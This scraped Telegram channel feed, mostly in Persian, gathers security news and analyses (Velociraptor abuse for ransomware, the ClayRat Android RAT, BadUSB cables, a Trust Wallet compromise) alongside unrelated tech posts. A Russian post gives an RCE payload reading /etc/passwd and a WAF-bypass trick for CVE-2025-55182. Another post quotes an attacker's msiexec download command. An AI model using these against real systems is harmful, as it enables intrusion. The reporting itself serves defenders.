کابل شارژی که دستگاه شما را هک میکند
یک BadUSB مبتنی بر ESP32-S3 .
ماژول در حالت STATION پیکربندی شده . شما باید یک نقطه دسترسی وایفای با تلفن همراه یا دستگاه دیگری راهاندازی کنید، کابل به طور خودکار به آن متصل میشود.
اینجا به صورت کامل در موردش (نصب و راه اندازی و غیره ) توضیح داده . ماژول هم که همه جا پیدا میشه ...
زیاد در کابل شارژ و موس و صفحه کلید و غیره پیدا میشه ..
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1
سوءاستفاده هوشمندانه هکرها از ابزار فارنزیک Velociraptor برای C2 و توزیع باجافزار
در یک چرخش تکنیکی قابل توجه، هگرها به جای استفاده از بدافزارهای سفارشی برای Command and Control (C2)، به سراغ ابزارهای قانونی و قدرتمند DFIR (Digital Forensics and Incident Response) رفتهاند. گزارشهای جدید محققان نشان میدهد که ابزار قانونی و محبوب Velociraptor اکنون به سلاحی برای استقرار باجافزار Warlock و ایجاد دسترسی پایدار تبدیل شده است.
استفاده از ابزارهای قانونی (Living off the Land) تشخیص را برای تیمهای SOC بسیار دشوار میکند، زیرا ترافیک و پروسههای Velociraptor در بسیاری از محیطها "تراستشده" و سفید محسوب میشوند.
زنجیره حمله (Kill Chain) و تحلیل فنی
مهاجمین در این کمپینها از ترکیبی از آسیبپذیریهای وب، ابزارهای مدیریت سیستم و تانلهای رمزنگاری شده استفاده کردهاند.
# ۱. دسترسی اولیه (Initial Access): بهرهبرداری از SharePoint و WSUS
نقطه ورود در اکثر موارد، اکسپلویت کردن سرورهای Patch نشده بوده است:
*۔ ToolShell Chain: استفاده از زنجیره آسیبپذیری SharePoint. ابتدا بایپس احراز هویت (CVE-2025-49706) و سپس اجرای کد از راه دور (CVE-2025-49704). مهاجمین فایلهای سیستمی شیرپوینت مانند
start.aspx یا ToolPane.aspx را به Web Shell تبدیل کردهاند.*۔ WSUS Exploitation: در برخی موارد، اکسپلویت CVE-2025-59287 روی سرویس WSUS مشاهده شده است.
# ۲. استقرار C2 با Velociraptor
پس از نفوذ، مهاجم با استفاده از دستورات
msiexec ، نسخههای MSI ابزار Velociraptor را از دامنههای Cloudflare Workers دانلود و نصب میکند:msiexec /q /i https:// [REDACTED] .workers .dev/ v3 .msi> نکته فنی: از آنجایی که Velociraptor به عنوان یک سرویس ویندوز نصب میشود، مهاجم بلافاصله دسترسی سطح SYSTEM و Persistence (پایداری) را به دست میآورد. این ابزار دقیقاً برای اجرای دستورات سطح پایین و کوئری گرفتن از سیستم طراحی شده که اکنون در خدمت مهاجم است.
# ۳. تانلینگ پیشرفته: دور زدن فایروال با VS Code و Cloudflare
برای مخفی ماندن ترافیک C2، مهاجمین از تکنیکهای هوشمندانهای استفاده کردند:
*۔ VS Code Tunnels: دانلود و نصب
code.exe (نسخه CLI ویژوال استودیو کد). از آنجا که این باینری توسط مایکروسافت امضا شده (Signed Binary)، توسط بسیاری از EDRها مسدود نمیشود. مهاجم با دستور tunnel service install یک تانل معکوس به سمت خود ایجاد میکند.*۔ Cloudflare Tunnels: استفاده از
cloudflared.exe برای ایجاد تانلهای خروجی امن که ترافیک مخرب را در دل ترافیک HTTPS قانونی مخفی میکند.تحلیل رفتاری و اشتباهات عجیب مهاجم 🥴
در جریان بررسی لاگها، چندین اشتباه مبتدیانه از سمت مهاجم (احتمالاً گروه Storm-2603) مشاهده شد که نشان میدهد حتی گروههای باجافزاری پیشرفته نیز دچار خطای انسانی میشوند:
* تایپ دستورات لینوکسی در ویندوز: مهاجم دستور
cat را در محیط CMD ویندوز اجرا کرده است!* فراموشی سینتکس: تلاش برای ساخت یوزر ادمین (
net user adminbak ... ) بدون سوئیچ /add که منجر به خطای دستور شد.* تلاشهای ناموفق: تلاش برای اجرای سرویس SSH قبل از نصب شدن آن روی سیستم.
باجافزار Warlock
هدف نهایی در یکی از این نفوذها، استقرار باجافزار Warlock بوده است. این باجافزار که از ژوئن ۲۰۲۵ فعال شده، پس از تثبیت دسترسی از طریق Velociraptor و غیرفعال کردن Windows Defender، اقدام به رمزگذاری فایلها میکند. نکته جالب اینجاست که در Note باجافزار، به دروغ ادعا شده نفوذ از طریق WSUS بوده، در حالی که شواهد فنی نفوذ از طریق SharePoint را تایید میکند (تکنیک Misdirection).
>> راهکارها
برای مقابله با این سبک از حملات که از ابزارهای مجاز سوءاستفاده میکنند، باید روی Behavioral Analytics تمرکز کنید:
۱. مانیتورینگ پروسههای فرزند IIS:
پروسه
w3wp.exe نباید پروسههایی مانند cmd.exe ، powershell.exe یا msiexec.exe را اسپان (Spawn) کند. این نشانه قطعی وجود Web Shell است.۲. بررسی نصبکنندههای MSI:
اجرای
msiexec که به URLهای خارجی (به خصوص دامنههای workers.dev یا github.io) اشاره دارد را بلاک کنید.۳. شناسایی ابزارهای مدیریتی غیرمجاز:
اگر در سازمان شما از Velociraptor استفاده نمیشود، وجود پروسه یا سرویس آن باید بلافاصله به عنوان Incident تلقی شود.
۴. کنترل تانلها:
ترافیک خروجی
code.exe یا cloudflared.exe را در فایروال لبه شبکه محدود کنید و آرگومانهای خط فرمان code.exe را برای کلمه کلیدی tunnel مانیتور کنید.@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
تحلیل بدافزار ClayRat:
نسل جدید جاسوسافزارهای اندرویدی با قابلیت دور زدن Play Protect
تیم تحقیقاتی زیمپریوم اخیراً از یک تروجان دسترسی از راه دور (RAT) جدید تحت عنوان ClayRat پرده برداشته است که سطح جدیدی از پیچیدگی در تهدیدات موبایلی را به نمایش میگذارد. این بدافزار که اولین بار در اکتبر ۲۰۲۵ شناسایی شد، با هدفگیری کاربران از طریق جعل برنامههای محبوب (مانند YouTube، تلگرام و اپلیکیشنهای خدماتی روسی) و توزیع از طریق دامینهای فیشینگ و حتی سرویسهای ابری مثل Dropbox، به سرعت در حال گسترش است.
مکانیزم عملکرد و فرار از شناسایی (Defense Evasion)
بدافزار ClayRat از یک تکنیک پیشرفته Dropper برای عبور از سدهای امنیتی اندروید استفاده میکند. برخلاف بدافزارهای سطح پایین، Payload مخرب اصلی در این بدافزار به صورت رمزنگاری شده با الگوریتم AES/CBC و کلیدهای تعبیهشده (Embedded Keys) در پوشه Assets برنامه مخفی میشود و تنها در زمان اجرا (Runtime) استخراج و فعال میگردد. این تکنیک باعث میشود آنالیز استاتیک و شناسایی امضا توسط آنتیویروسهای معمولی دشوار شود.
سوءاستفاده از Accessibility Services
خطرناکترین ویژگی ClayRat، بهرهبرداری تهاجمی از سرویسهای دسترسیپذیری (Accessibility) است. پس از فریب کاربر برای اعطای این مجوز به همراه مجوز پیشفرض SMS، بدافزار اقدامات زیر را انجام میدهد:
۱. غیرفعالسازی Google Play Protect: بدافزار با شبیهسازی کلیکهای کاربر، وارد تنظیمات شده و سپر امنیتی گوگل را بدون اطلاع قربانی خاموش میکند.
۲. سرقت اعتبارنامه قفل صفحه: تمامی تعاملات کاربر با صفحه قفل (Lock Screen) مانیتور میشود. الگوها (Patterns)، پینکدها و پسوردها با دقت بالا بازسازی شده و در
SharedPreferences (تحت کلید lock_password_storage) ذخیره میشوند.۳. بازگشایی خودکار (Auto-unlock): با استفاده از اعتبارنامههای سرقت شده، بدافزار میتواند مکانیزم امنیتی صفحه قفل را دور زده و دسترسی مداوم خود را حفظ کند.
قابلیتهای جاسوسی و Exfiltration
پس از استقرار کامل، ClayRat دسترسی کاملی به دادههای قربانی پیدا میکند:
* سرقت کامل پیامکها (SMS) و لیست تماسها.
* شنود و رهگیری نوتیفیکیشنها (برای سرقت کدهای 2FA).
* ضبط صفحه نمایش با استفاده از MediaProjection API.
* عکسبرداری مخفیانه با دوربین دستگاه.
...
شماهایی که سریع دست به اس.لحه (صفحهکلید ... ) هستین حتما نگهبانی گماشتین دیگه . با دسترسی به AccessibilityService و ایجاد آپشنهای مختلف رصد کنید و تحلیل رفتار پویا داشته باشید .
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2025-55182-custom-simple.yaml
1 KB
🔥 Интересный кейс с CVE-2025-55182 и байпас Cloudflare
При детекте уязвимости CVE-2025-55182 (React Server Components RCE) столкнулся с проблемой:
❌темплейты не детектили уязвимость на ряде хостов где ручная валидация POST реквеста находила
❌ Официальный темплейт от ProjectDiscovery тоже не сработал
💡 Найденное решение - байпас Cloudflare:
Ключевое отличие - огромный base64 блок (131KB) с случайным именем поля "hlmvbjtvunst".
Зачем это нужно:
🔹 Большой размер запроса обходит проверки размера WAF
🔹 Случайные данные обходят сигнатурные проверки
🔹 Случайное имя поля обходит проверки имен полей
📝 Структура payload:
Результат возвращается через redirect:
✅ Финальное решение:
Создал универсальный темплейт с двухэтапным подходом:
1. Первый блок - без base64 (быстро для обычных инстансов)
Проверяет 7 стандартных путей:
2. Второй блок - с base64 обходом Cloudflare (если первый не сработал)
Особенности:
• Работает на разных путях Next.js/React Server Components
• Автоматически определяет необходимость байпаса Cloudflare
• Прямой детект через чтение
• Специфичные matchers избегают ложных срабатываний
💭 Выводы:
1. WAF/Cloudflare могут блокировать даже валидные эксплойты
2. Большие случайные данные могут обходить защиту
3. Важно анализировать рабочие запросы из Burp, а не только PoC
4. Двухэтапный подход оптимизирует массовое сканирование
При детекте уязвимости CVE-2025-55182 (React Server Components RCE) столкнулся с проблемой:
❌темплейты не детектили уязвимость на ряде хостов где ручная валидация POST реквеста находила
❌ Официальный темплейт от ProjectDiscovery тоже не сработал
💡 Найденное решение - байпас Cloudflare:
Ключевое отличие - огромный base64 блок (131KB) с случайным именем поля "hlmvbjtvunst".
Зачем это нужно:
🔹 Большой размер запроса обходит проверки размера WAF
🔹 Случайные данные обходят сигнатурные проверки
🔹 Случайное имя поля обходит проверки имен полей
📝 Структура payload:
execSync('cat /etc/passwd | awk -v ORS=- 1')
Результат возвращается через redirect:
X-Action-Redirect: /login?a=root:x:0:0:root:/root:/bin/sh-...
✅ Финальное решение:
Создал универсальный темплейт с двухэтапным подходом:
1. Первый блок - без base64 (быстро для обычных инстансов)
Проверяет 7 стандартных путей:
/api, /, /formaction, /actions и др.2. Второй блок - с base64 обходом Cloudflare (если первый не сработал)
Особенности:
• Работает на разных путях Next.js/React Server Components
• Автоматически определяет необходимость байпаса Cloudflare
• Прямой детект через чтение
/etc/passwd• Специфичные matchers избегают ложных срабатываний
💭 Выводы:
1. WAF/Cloudflare могут блокировать даже валидные эксплойты
2. Большие случайные данные могут обходить защиту
3. Важно анализировать рабочие запросы из Burp, а не только PoC
4. Двухэтапный подход оптимизирует массовое сканирование
malware-analysis-report-brickstorm-backdoor.pdf
1.4 MB
گزارش تحلیل بدافزار بکدور BRICKSTORM که توسط هکرهای دولتی چین و با زبان GO نوشته شده . ارائه مشترک توسط آژانس امنیت سایبری و زیرساخت (CISA)، آژانس امنیت ملی (NSA) و مرکز امنیت سایبری کانادا (CCCS) در تاریخ ۴ دسامبر ۲۰۲۵ منتشر شده است.
آسیب پذیری در Gogs , یک پلتفرم سلفهاست متنباز برای مدیریت مخازن Git.
https://github.com/Ashwesker/Blackash-CVE-2025-8110
https://github.com/Ashwesker/Blackash-CVE-2025-8110
gogs.io
Gogs: A painless self-hosted Git service
Gogs is a painless self-hosted Git service.
Forwarded from Md Daily (Mahan)
کد تمیز افسانه نیست؛ فقط دوام نمیاره
مشکل این نیست که هیچکس کد تمیز نمینویسه.
مشکل اینه که کد تمیز تو پروژههای واقعی، زیر فشارِ کار کمکم داغون میشه.
اگه یه مدت تو یه تیم کار کرده باشی، حتماً دیدی: کدی که اوایل مرتب و قابل فهم بوده، با اضافه شدن فیچرهای عجلهای، ددلاینها و تصمیمهای لحظهای، کمکم شلوغ و سختفهم میشه. نه به این خاطر که برنامهنویسا بلد نیستن، به این خاطر که واقعیت پروژه این شکلیه.
✨ اصلاً کد تمیز یعنی چی؟
کد تمیز یه چیز کاملاً سلیقهای نیست. بعضی چیزاش واضحه: اسم متغیر و فانکشن باید درست باشه، هر تیکه کد باید کار خودش رو بکنه، وابستگیها نباید قاطیپاطی باشن و بشه راحت تغییرش داد بدون اینکه کل سیستم بریزه به هم.
البته همهچیز هم قانون خشک نداره. کدی که امروز تمیزه، ممکنه چند ماه دیگه فقط قابل تحمل باشه.
تعریف سادهش اینه: کدی که تغییر دادنش از نوشتنش کمهزینهتره.
🖥 پروژهها از اول داغون نیستن، داغون میشن.
تقریباً هیچ پروژهای از همون اول شلخته شروع نمیشه. همهچی مرتب و با برنامه جلو میره. ولی کمکم ددلاین میاد، مشتری عجله داره، بازار فشار میاره. اگه حواست نباشه، اون نظم اولیه میپاشه.
🖥 پروتوتایپی که قرار نبود بمونه.
یه کد موقتی مینویسن که فقط یه چیز رو نشون بده. قرار بوده یکی دو هفته بعد بندازنش دور. ولی بیزنس خوشش میاد، میگه یه چیز کوچولو هم بهش اضافه کن. بعد یکی دیگه. بعد یهو همون کد میره تو پروداکشن و میشه هستهی سیستم. اینجا مشکل کد بد نیست، مشکل اینه که تصمیم بد جدی گرفته شده.
🖥 ریفکتوری که تموم نمیشه.
اگه یه تمیزکاری سالها طول کشیده، معمولاً مشکل از کد نیست. یا تست ندارین، یا معلوم نیست مسئول این بخش کیه، یا همه میترسن دست بزنن چیزی خراب بشه. ریفکتور وقتی به کار واقعی وصل نباشه، میشه کاری که همیشه هست ولی هیچوقت تموم نمیشه.
سنیور سختگیر همیشه خوب نیست.
سنیوری که فقط ایراد میگیره و فضا رو ترسناک میکنه، به تمیز شدن کد کمک نمیکنه. باعث میشه بقیه یواشکی کد بزنن که فقط کار راه بیفته. اینجوری کد بد قایم میشه، نه اینکه درست بشه.
راهحلهای موقت، وقتی دائم میشن دردسر میسازن.
یه هک سریع یا فلگ موقتی بعضی وقتا لازمه. مشکل وقتی شروع میشه که اسم درست نداره، کسی نمیدونه چرا هست، و معلوم نیست کی باید حذفش کنه. اون موقع میشه یه تیکه خطرناک که همه ازش فرار میکنن.
🤖 هوش مصنوعی کد زشت نمینویسه، کد بیمسئولیت مینویسه.
کدی که AI میده معمولاً قشنگه، ولی نمیدونه پروژه قراره کجا بره، چرا این تصمیم گرفته شده، و آخرش کی قراره نگهداریش کنه. کدی که صاحب نداشته باشه، حتی اگه تمیز به نظر بیاد، آخرش دردسر میشه.
📊 بیزنس و کد دشمن هم نیستن.
بیزنس میخواد زنده بمونه، برنامهنویس میخواد سیستم نخوابه. نه سرعت بدون فکر جواب میده، نه وسواس بیش از حد. کدی که نشه راحت تغییرش داد، بیزنس رو کند میکنه. بیزنسی هم که به کد اهمیت نده، بعداً هزینهشو میده.
🤔 پس بیخیال کد تمیز بشیم؟ نه.
ولی واقعبین باشیم. کد تمیز یه مقصد نیست، یه تعهده. تعهد به تیم، به خودِ چند ماه بعدمون، و به پروژهای که قراره زنده بمونه. نه وسواس، نه شلگیری. فقط مسئولیت.
🔗 برای نوشتن این پست از این منبع خیلی الهام گرفته شده:
https://dev.to/sylwia-lask/nobody-writes-clean-code-we-all-just-pretend-11d1
—-
💡 مثل همیشه کنجکاو بمونید :)
🆔 @MdDaily
مشکل این نیست که هیچکس کد تمیز نمینویسه.
مشکل اینه که کد تمیز تو پروژههای واقعی، زیر فشارِ کار کمکم داغون میشه.
اگه یه مدت تو یه تیم کار کرده باشی، حتماً دیدی: کدی که اوایل مرتب و قابل فهم بوده، با اضافه شدن فیچرهای عجلهای، ددلاینها و تصمیمهای لحظهای، کمکم شلوغ و سختفهم میشه. نه به این خاطر که برنامهنویسا بلد نیستن، به این خاطر که واقعیت پروژه این شکلیه.
کد تمیز یه چیز کاملاً سلیقهای نیست. بعضی چیزاش واضحه: اسم متغیر و فانکشن باید درست باشه، هر تیکه کد باید کار خودش رو بکنه، وابستگیها نباید قاطیپاطی باشن و بشه راحت تغییرش داد بدون اینکه کل سیستم بریزه به هم.
البته همهچیز هم قانون خشک نداره. کدی که امروز تمیزه، ممکنه چند ماه دیگه فقط قابل تحمل باشه.
تعریف سادهش اینه: کدی که تغییر دادنش از نوشتنش کمهزینهتره.
تقریباً هیچ پروژهای از همون اول شلخته شروع نمیشه. همهچی مرتب و با برنامه جلو میره. ولی کمکم ددلاین میاد، مشتری عجله داره، بازار فشار میاره. اگه حواست نباشه، اون نظم اولیه میپاشه.
یه کد موقتی مینویسن که فقط یه چیز رو نشون بده. قرار بوده یکی دو هفته بعد بندازنش دور. ولی بیزنس خوشش میاد، میگه یه چیز کوچولو هم بهش اضافه کن. بعد یکی دیگه. بعد یهو همون کد میره تو پروداکشن و میشه هستهی سیستم. اینجا مشکل کد بد نیست، مشکل اینه که تصمیم بد جدی گرفته شده.
اگه یه تمیزکاری سالها طول کشیده، معمولاً مشکل از کد نیست. یا تست ندارین، یا معلوم نیست مسئول این بخش کیه، یا همه میترسن دست بزنن چیزی خراب بشه. ریفکتور وقتی به کار واقعی وصل نباشه، میشه کاری که همیشه هست ولی هیچوقت تموم نمیشه.
سنیور سختگیر همیشه خوب نیست.
سنیوری که فقط ایراد میگیره و فضا رو ترسناک میکنه، به تمیز شدن کد کمک نمیکنه. باعث میشه بقیه یواشکی کد بزنن که فقط کار راه بیفته. اینجوری کد بد قایم میشه، نه اینکه درست بشه.
راهحلهای موقت، وقتی دائم میشن دردسر میسازن.
یه هک سریع یا فلگ موقتی بعضی وقتا لازمه. مشکل وقتی شروع میشه که اسم درست نداره، کسی نمیدونه چرا هست، و معلوم نیست کی باید حذفش کنه. اون موقع میشه یه تیکه خطرناک که همه ازش فرار میکنن.
کدی که AI میده معمولاً قشنگه، ولی نمیدونه پروژه قراره کجا بره، چرا این تصمیم گرفته شده، و آخرش کی قراره نگهداریش کنه. کدی که صاحب نداشته باشه، حتی اگه تمیز به نظر بیاد، آخرش دردسر میشه.
بیزنس میخواد زنده بمونه، برنامهنویس میخواد سیستم نخوابه. نه سرعت بدون فکر جواب میده، نه وسواس بیش از حد. کدی که نشه راحت تغییرش داد، بیزنس رو کند میکنه. بیزنسی هم که به کد اهمیت نده، بعداً هزینهشو میده.
ولی واقعبین باشیم. کد تمیز یه مقصد نیست، یه تعهده. تعهد به تیم، به خودِ چند ماه بعدمون، و به پروژهای که قراره زنده بمونه. نه وسواس، نه شلگیری. فقط مسئولیت.
https://dev.to/sylwia-lask/nobody-writes-clean-code-we-all-just-pretend-11d1
—-
🆔 @MdDaily
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from ایمن نوشت
درس بزرگ برای همه کاربران نرمافزارهای تخصصی: امنیت فقط فیشینگ نیست!
نرمافزار محبوب بلندر (Blender) یک نرمافزار رایگان و بازمتن مشهور برای مدلسازی و ساخت انیمیشن است. این نرمافزار گزینهای به نام Auto Run Python Scripts برای اجرای خودکار کدهای زبان پایتون دارد. این قابلیت به هنرمندان اجازه میدهد بعضی کارهای تکراری را خودکار پیش ببرند.
شما وسط یک پروژه سنگین هستید، زمان کم دارید و ناگهان در یک سایت اینترنتی، مدلی سهبعدی و فوقالعاده پیدا میکنید که «رایگان» هم است. با خوشحالی دانلودش میکنید تا پروژه شما سریعتر پیش برود. اما هکرها دقیقا برای همین لحظه برنامهریزی کردهاند و فایلی را وارد سیستم میکنند که زندگی دیجیتالتان را به باد میدهد!
حالا مشکل کجاست؟ اگر این گزینه در تنظیمات روشن باشد (که خیلیها برای راحتی کار آن را روشن نگه میدارند)، به محض باز کردن فایلی که پسوند «blend.» دارد، کدهای درون فایل بدون هیچ سوالی اجرا میشوند. هکرها هم از همین «ویژگی» سوءاستفاده میکنند و حتی نیازی به سوء استفاده از هیچ آسیبپذیری و باگی ندارند!
🌐 @ImenNevesht
❗️کانال اطلاع رسانی امنیت و تکنولوژی
نرمافزار محبوب بلندر (Blender) یک نرمافزار رایگان و بازمتن مشهور برای مدلسازی و ساخت انیمیشن است. این نرمافزار گزینهای به نام Auto Run Python Scripts برای اجرای خودکار کدهای زبان پایتون دارد. این قابلیت به هنرمندان اجازه میدهد بعضی کارهای تکراری را خودکار پیش ببرند.
شما وسط یک پروژه سنگین هستید، زمان کم دارید و ناگهان در یک سایت اینترنتی، مدلی سهبعدی و فوقالعاده پیدا میکنید که «رایگان» هم است. با خوشحالی دانلودش میکنید تا پروژه شما سریعتر پیش برود. اما هکرها دقیقا برای همین لحظه برنامهریزی کردهاند و فایلی را وارد سیستم میکنند که زندگی دیجیتالتان را به باد میدهد!
حالا مشکل کجاست؟ اگر این گزینه در تنظیمات روشن باشد (که خیلیها برای راحتی کار آن را روشن نگه میدارند)، به محض باز کردن فایلی که پسوند «blend.» دارد، کدهای درون فایل بدون هیچ سوالی اجرا میشوند. هکرها هم از همین «ویژگی» سوءاستفاده میکنند و حتی نیازی به سوء استفاده از هیچ آسیبپذیری و باگی ندارند!
🌐 @ImenNevesht
❗️کانال اطلاع رسانی امنیت و تکنولوژی
👍1
Decoded رمزگشایی
هنر ریاضیات
بازی/سرگرمی/شطرنج/علاقه/گفتگو/زبان نوابغ
بیچاره شاگردی که از استادش بهتر نشود .
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Moviie_moood
🎥فیلم " رمزگشایی 2024 "
🎙#دوبله_فارسی
📤 کیفیت 720
✂️ #بدون_سانسور
🎙#دوبله_فارسی
📤 کیفیت 720
✂️ #بدون_سانسور
Forwarded from شهر سخت افزار
🔷 اطلاعات تازه از لپتاپ رول شونده لنوو: یک غول واقعی با RTX 5090
🔻چند روز قبل گزارشهایی منتشر شد که حاکی از آن بود که لنوو در حال آمادهسازی یک لپتاپ بسیار غیرمعمول با نام Legion Pro Rollable است؛ دستگاهی که نمایشگر معمولی 16 اینچی با نسبت تصویر 16:9 آن به صورت افقی باز شده و در نهایت به یک لپتاپ 24 اینچی اولتراواید با نسبت تصویر 21:9 تبدیل میگردد.
🔻بر اساس مشخصات به روز شده، طراحی این مدل در اصل بر پایه Legion Pro 7i خواهد بود، اما با بدنهای کاملاً جدید که برای مکانیزم رول شونده بازطراحی شده است.
🔻لپتاپ Legion Pro Rollable قرار است به کارت گرافیک GeForce RTX 5090 لپتاپی از انویدیا مجهز شده و در کنار آن هم از یک پردازنده رده بالای Intel Core Ultra در بالاترین پیکربندی ممکن استفاده شود.
🌐جزئیات بیشتر در رابطه با این غول گیمینگ
🆔 @ShahrSakhtAfzar
🔻چند روز قبل گزارشهایی منتشر شد که حاکی از آن بود که لنوو در حال آمادهسازی یک لپتاپ بسیار غیرمعمول با نام Legion Pro Rollable است؛ دستگاهی که نمایشگر معمولی 16 اینچی با نسبت تصویر 16:9 آن به صورت افقی باز شده و در نهایت به یک لپتاپ 24 اینچی اولتراواید با نسبت تصویر 21:9 تبدیل میگردد.
🔻بر اساس مشخصات به روز شده، طراحی این مدل در اصل بر پایه Legion Pro 7i خواهد بود، اما با بدنهای کاملاً جدید که برای مکانیزم رول شونده بازطراحی شده است.
🔻لپتاپ Legion Pro Rollable قرار است به کارت گرافیک GeForce RTX 5090 لپتاپی از انویدیا مجهز شده و در کنار آن هم از یک پردازنده رده بالای Intel Core Ultra در بالاترین پیکربندی ممکن استفاده شود.
🌐جزئیات بیشتر در رابطه با این غول گیمینگ
🆔 @ShahrSakhtAfzar
🚨هشدار امنیتی
به نظر میرسد که تراستوالت در بهروزرسانی ۲۴ دسامبر به خطر افتاده باشد.
گزارشها نشان میدهد که وارد کردن یک عبارت بازیابی (seed phrase) در افزونه میتواند منجر به خالی شدن فوری موجودی کیف پول شود.
⚠️فعلاً از افزونهی Trust Wallet استفاده نکنید و تا زمانی که توضیحات و راهحل رسمی منتشر نشده، هرگز عبارت بازیابی (seed phrase) را وارد نکنید.
❗️تاکنون، هیچ ارتباط رسمی از تیم Trust Wallet در مورد این حادثه وجود نداشته است.
سوءاستفادهکنندگان از چندین آدرس استفاده میکنند و به نظر میرسد بیش از ۲،۰۰۰،۰۰۰ دلار از آنها سرقت شده است.
به نظر میرسد که تراستوالت در بهروزرسانی ۲۴ دسامبر به خطر افتاده باشد.
گزارشها نشان میدهد که وارد کردن یک عبارت بازیابی (seed phrase) در افزونه میتواند منجر به خالی شدن فوری موجودی کیف پول شود.
⚠️فعلاً از افزونهی Trust Wallet استفاده نکنید و تا زمانی که توضیحات و راهحل رسمی منتشر نشده، هرگز عبارت بازیابی (seed phrase) را وارد نکنید.
❗️تاکنون، هیچ ارتباط رسمی از تیم Trust Wallet در مورد این حادثه وجود نداشته است.
سوءاستفادهکنندگان از چندین آدرس استفاده میکنند و به نظر میرسد بیش از ۲،۰۰۰،۰۰۰ دلار از آنها سرقت شده است.